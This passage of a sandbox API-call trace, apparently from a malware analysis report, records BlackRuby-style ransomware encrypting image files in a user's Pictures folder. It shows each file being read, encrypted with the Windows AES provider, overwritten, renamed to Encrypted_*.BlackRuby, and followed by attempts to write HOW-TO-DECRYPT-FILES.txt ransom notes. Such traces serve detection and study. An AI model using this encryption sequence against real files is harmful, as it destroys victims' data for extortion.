(uMode=0x1) returned 0x0 [0061.494] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\k-ps7bfwksle.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.494] GetLastError () returned 0x0 [0061.494] GetFileType (hFile=0x258) returned 0x1 [0061.494] SetErrorMode (uMode=0x0) returned 0x1 [0061.494] GetFileType (hFile=0x258) returned 0x1 [0061.494] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x7833 [0061.494] GetLastError () returned 0x0 [0061.494] ReadFile (in: hFile=0x258, lpBuffer=0x1c71a34, nNumberOfBytesToRead=0x7833, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1c71a34*, lpNumberOfBytesRead=0x18ecac*=0x7833, lpOverlapped=0x0) returned 1 [0061.495] GetLastError () returned 0x0 [0061.495] CloseHandle (hObject=0x258) returned 1 [0061.495] GetLastError () returned 0x0 [0061.495] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", lpFilePart=0x0) returned 0x47 [0061.495] GetLastError () returned 0x0 [0061.495] SetErrorMode (uMode=0x1) returned 0x0 [0061.495] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\k-ps7bfwksle.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20b09680, ftCreationTime.dwHighDateTime=0x1d34a71, ftLastAccessTime.dwLowDateTime=0xef9d5c20, ftLastAccessTime.dwHighDateTime=0x1d34eb9, ftLastWriteTime.dwLowDateTime=0xef9d5c20, ftLastWriteTime.dwHighDateTime=0x1d34eb9, nFileSizeHigh=0x0, nFileSizeLow=0x7833)) returned 1 [0061.495] GetLastError () returned 0x0 [0061.495] SetErrorMode (uMode=0x0) returned 0x1 [0061.506] CryptImportKey (in: hProv=0x37c790, pbData=0x1cdae80, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360ce0) returned 1 [0061.506] GetLastError () returned 0x0 [0061.506] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.506] GetLastError () returned 0x0 [0061.511] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.511] GetLastError () returned 0x0 [0061.511] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360c20) returned 1 [0061.511] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.511] GetLastError () returned 0x0 [0061.511] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1d07ecc*=0x1, dwFlags=0x0) returned 1 [0061.511] GetLastError () returned 0x0 [0061.511] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1d07e98, dwFlags=0x0) returned 1 [0061.511] GetLastError () returned 0x0 [0061.511] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d07f14*, pdwDataLen=0x18ec9c*=0x7930, dwBufLen=0x7930 | out: pbData=0x1d07f14*, pdwDataLen=0x18ec9c*=0x7930) returned 1 [0061.512] GetLastError () returned 0x0 [0061.512] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d171a0*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1d171a0*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0061.512] GetLastError () returned 0x0 [0061.512] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d171d0*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1d171d0*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0061.512] GetLastError () returned 0x0 [0061.512] CryptDestroyKey (hKey=0x360ce0) returned 1 [0061.512] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.512] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.512] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", lpFilePart=0x0) returned 0x47 [0061.512] GetLastError () returned 0x0 [0061.512] SetErrorMode (uMode=0x1) returned 0x0 [0061.513] GetFileType (hFile=0x258) returned 0x1 [0061.513] GetFileType (hFile=0x258) returned 0x1 [0061.514] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\k-ps7bfwksle.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_hNlCvUag8KRI0MlH6MDUZ56865LrPqjkAzuoKWfAPRrad.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\encrypted_hnlcvuag8kri0mlh6mduz56865lrpqjkazuokwfaprrad.blackruby")) returned 1 [0061.515] GetLastError () returned 0xb7 [0061.516] SetErrorMode (uMode=0x0) returned 0x1 [0061.520] SetErrorMode (uMode=0x1) returned 0x0 [0061.520] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\mi_woju7plljgjjqgar.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.520] GetLastError () returned 0x0 [0061.520] GetFileType (hFile=0x258) returned 0x1 [0061.520] SetErrorMode (uMode=0x0) returned 0x1 [0061.520] GetFileType (hFile=0x258) returned 0x1 [0061.520] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x16e45 [0061.520] GetLastError () returned 0x0 [0061.521] ReadFile (in: hFile=0x258, lpBuffer=0x2d29c10, nNumberOfBytesToRead=0x16e45, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2d29c10*, lpNumberOfBytesRead=0x18ecac*=0x16e45, lpOverlapped=0x0) returned 1 [0061.522] GetLastError () returned 0x0 [0061.522] CloseHandle (hObject=0x258) returned 1 [0061.522] GetLastError () returned 0x0 [0061.523] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png", lpFilePart=0x0) returned 0x4e [0061.523] GetLastError () returned 0x0 [0061.523] SetErrorMode (uMode=0x1) returned 0x0 [0061.523] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\mi_woju7plljgjjqgar.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa32740, ftCreationTime.dwHighDateTime=0x1d3517a, ftLastAccessTime.dwLowDateTime=0xd7eb0090, ftLastAccessTime.dwHighDateTime=0x1d35973, ftLastWriteTime.dwLowDateTime=0xd7eb0090, ftLastWriteTime.dwHighDateTime=0x1d35973, nFileSizeHigh=0x0, nFileSizeLow=0x16e45)) returned 1 [0061.523] GetLastError () returned 0x0 [0061.523] SetErrorMode (uMode=0x0) returned 0x1 [0061.523] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c818) returned 1 [0061.523] GetLastError () returned 0x0 [0061.558] CryptImportKey (in: hProv=0x37c818, pbData=0x1ba466c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360f20) returned 1 [0061.558] GetLastError () returned 0x0 [0061.558] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.558] GetLastError () returned 0x0 [0061.564] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.564] GetLastError () returned 0x0 [0061.564] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360de0) returned 1 [0061.564] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.564] GetLastError () returned 0x0 [0061.564] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1bd16b8*=0x1, dwFlags=0x0) returned 1 [0061.564] GetLastError () returned 0x0 [0061.564] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1bd1684, dwFlags=0x0) returned 1 [0061.564] GetLastError () returned 0x0 [0061.564] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d579e0*, pdwDataLen=0x18ec9c*=0x16f40, dwBufLen=0x16f40 | out: pbData=0x2d579e0*, pdwDataLen=0x18ec9c*=0x16f40) returned 1 [0061.565] GetLastError () returned 0x0 [0061.566] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd1714*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1bd1714*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0061.566] GetLastError () returned 0x0 [0061.566] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bd1744*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1bd1744*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0061.566] GetLastError () returned 0x0 [0061.567] CryptDestroyKey (hKey=0x360f20) returned 1 [0061.567] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.567] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.567] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png", lpFilePart=0x0) returned 0x4e [0061.567] GetLastError () returned 0x0 [0061.567] SetErrorMode (uMode=0x1) returned 0x0 [0061.567] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\mi_woju7plljgjjqgar.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.568] GetLastError () returned 0xb7 [0061.568] GetFileType (hFile=0x258) returned 0x1 [0061.568] SetErrorMode (uMode=0x0) returned 0x1 [0061.568] GetFileType (hFile=0x258) returned 0x1 [0061.570] CloseHandle (hObject=0x258) returned 1 [0061.570] GetLastError () returned 0xb7 [0061.570] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png", lpFilePart=0x0) returned 0x4e [0061.570] GetLastError () returned 0xb7 [0061.570] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_m3NC2N9VYAdbG48JJCDcBJuA2iYQMIuDwoFU.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_m3NC2N9VYAdbG48JJCDcBJuA2iYQMIuDwoFU.BlackRuby", lpFilePart=0x0) returned 0x6f [0061.570] GetLastError () returned 0xb7 [0061.570] SetErrorMode (uMode=0x1) returned 0x0 [0061.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\mi_woju7plljgjjqgar.png"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa32740, ftCreationTime.dwHighDateTime=0x1d3517a, ftLastAccessTime.dwLowDateTime=0xd7eb0090, ftLastAccessTime.dwHighDateTime=0x1d35973, ftLastWriteTime.dwLowDateTime=0x2ce42320, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x16f50)) returned 1 [0061.571] GetLastError () returned 0xb7 [0061.571] SetErrorMode (uMode=0x0) returned 0x1 [0061.571] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Mi_wOju7PllJGjJqGAr.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\mi_woju7plljgjjqgar.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_m3NC2N9VYAdbG48JJCDcBJuA2iYQMIuDwoFU.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\encrypted_m3nc2n9vyadbg48jjcdcbjua2iyqmiudwofu.blackruby")) returned 1 [0061.571] GetLastError () returned 0xb7 [0061.572] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4f [0061.572] GetLastError () returned 0xb7 [0061.572] SetErrorMode (uMode=0x1) returned 0x0 [0061.572] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.572] GetLastError () returned 0x5 [0061.573] SetErrorMode (uMode=0x0) returned 0x1 [0061.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", lpFilePart=0x0) returned 0x4b [0061.573] GetLastError () returned 0x5 [0061.573] SetErrorMode (uMode=0x1) returned 0x0 [0061.573] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n5urhunl8odk8z8u.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1beebec | out: lpFileInformation=0x1beebec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x737fe5b0, ftCreationTime.dwHighDateTime=0x1d357c2, ftLastAccessTime.dwLowDateTime=0x39b55f30, ftLastAccessTime.dwHighDateTime=0x1d3549e, ftLastWriteTime.dwLowDateTime=0x39b55f30, ftLastWriteTime.dwHighDateTime=0x1d3549e, nFileSizeHigh=0x0, nFileSizeLow=0x4724)) returned 1 [0061.573] GetLastError () returned 0x5 [0061.573] SetErrorMode (uMode=0x0) returned 0x1 [0061.573] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", lpFilePart=0x0) returned 0x4b [0061.574] GetLastError () returned 0x5 [0061.574] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", lpFilePart=0x0) returned 0x4b [0061.574] GetLastError () returned 0x5 [0061.574] SetErrorMode (uMode=0x1) returned 0x0 [0061.574] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n5urhunl8odk8z8u.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.574] GetLastError () returned 0x0 [0061.574] GetFileType (hFile=0x258) returned 0x1 [0061.574] SetErrorMode (uMode=0x0) returned 0x1 [0061.574] GetFileType (hFile=0x258) returned 0x1 [0061.574] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x4724 [0061.574] GetLastError () returned 0x0 [0061.574] ReadFile (in: hFile=0x258, lpBuffer=0x1bf0bd8, nNumberOfBytesToRead=0x4724, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1bf0bd8*, lpNumberOfBytesRead=0x18ecac*=0x4724, lpOverlapped=0x0) returned 1 [0061.576] GetLastError () returned 0x0 [0061.576] CloseHandle (hObject=0x258) returned 1 [0061.576] GetLastError () returned 0x0 [0061.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", lpFilePart=0x0) returned 0x4b [0061.576] GetLastError () returned 0x0 [0061.576] SetErrorMode (uMode=0x1) returned 0x0 [0061.576] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n5urhunl8odk8z8u.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x737fe5b0, ftCreationTime.dwHighDateTime=0x1d357c2, ftLastAccessTime.dwLowDateTime=0x39b55f30, ftLastAccessTime.dwHighDateTime=0x1d3549e, ftLastWriteTime.dwLowDateTime=0x39b55f30, ftLastWriteTime.dwHighDateTime=0x1d3549e, nFileSizeHigh=0x0, nFileSizeLow=0x4724)) returned 1 [0061.576] GetLastError () returned 0x0 [0061.576] SetErrorMode (uMode=0x0) returned 0x1 [0061.576] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c4e8) returned 1 [0061.576] GetLastError () returned 0x0 [0061.612] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c53e18, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360ae0) returned 1 [0061.612] GetLastError () returned 0x0 [0061.612] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.613] GetLastError () returned 0x0 [0061.618] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.618] GetLastError () returned 0x0 [0061.618] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360fa0) returned 1 [0061.618] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.618] GetLastError () returned 0x0 [0061.618] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1c80e64*=0x1, dwFlags=0x0) returned 1 [0061.618] GetLastError () returned 0x0 [0061.618] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1c80e30, dwFlags=0x0) returned 1 [0061.618] GetLastError () returned 0x0 [0061.618] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c80eac*, pdwDataLen=0x18ec9c*=0x4820, dwBufLen=0x4820 | out: pbData=0x1c80eac*, pdwDataLen=0x18ec9c*=0x4820) returned 1 [0061.618] GetLastError () returned 0x0 [0061.618] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c89f18*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c89f18*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0061.618] GetLastError () returned 0x0 [0061.618] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c89f48*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c89f48*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0061.618] GetLastError () returned 0x0 [0061.618] CryptDestroyKey (hKey=0x360ae0) returned 1 [0061.618] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.618] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.618] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", lpFilePart=0x0) returned 0x4b [0061.618] GetLastError () returned 0x0 [0061.618] SetErrorMode (uMode=0x1) returned 0x0 [0061.618] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n5urhunl8odk8z8u.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.620] GetLastError () returned 0xb7 [0061.620] GetFileType (hFile=0x258) returned 0x1 [0061.620] SetErrorMode (uMode=0x0) returned 0x1 [0061.620] GetFileType (hFile=0x258) returned 0x1 [0061.623] CloseHandle (hObject=0x258) returned 1 [0061.623] GetLastError () returned 0xb7 [0061.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp", lpFilePart=0x0) returned 0x4b [0061.623] GetLastError () returned 0xb7 [0061.623] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_atPQ6RiKtnKvixT5STPriFKlG8fPDdH78EIQUsx365.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_atPQ6RiKtnKvixT5STPriFKlG8fPDdH78EIQUsx365.BlackRuby", lpFilePart=0x0) returned 0x75 [0061.623] GetLastError () returned 0xb7 [0061.623] SetErrorMode (uMode=0x1) returned 0x0 [0061.623] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n5urhunl8odk8z8u.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x737fe5b0, ftCreationTime.dwHighDateTime=0x1d357c2, ftLastAccessTime.dwLowDateTime=0x39b55f30, ftLastAccessTime.dwHighDateTime=0x1d3549e, ftLastWriteTime.dwLowDateTime=0x2ceda8a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4830)) returned 1 [0061.623] GetLastError () returned 0xb7 [0061.623] SetErrorMode (uMode=0x0) returned 0x1 [0061.623] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\n5urHunL8odK8z8U.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\n5urhunl8odk8z8u.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_atPQ6RiKtnKvixT5STPriFKlG8fPDdH78EIQUsx365.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\encrypted_atpq6riktnkvixt5stprifklg8fpddh78eiqusx365.blackruby")) returned 1 [0061.624] GetLastError () returned 0xb7 [0061.624] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: 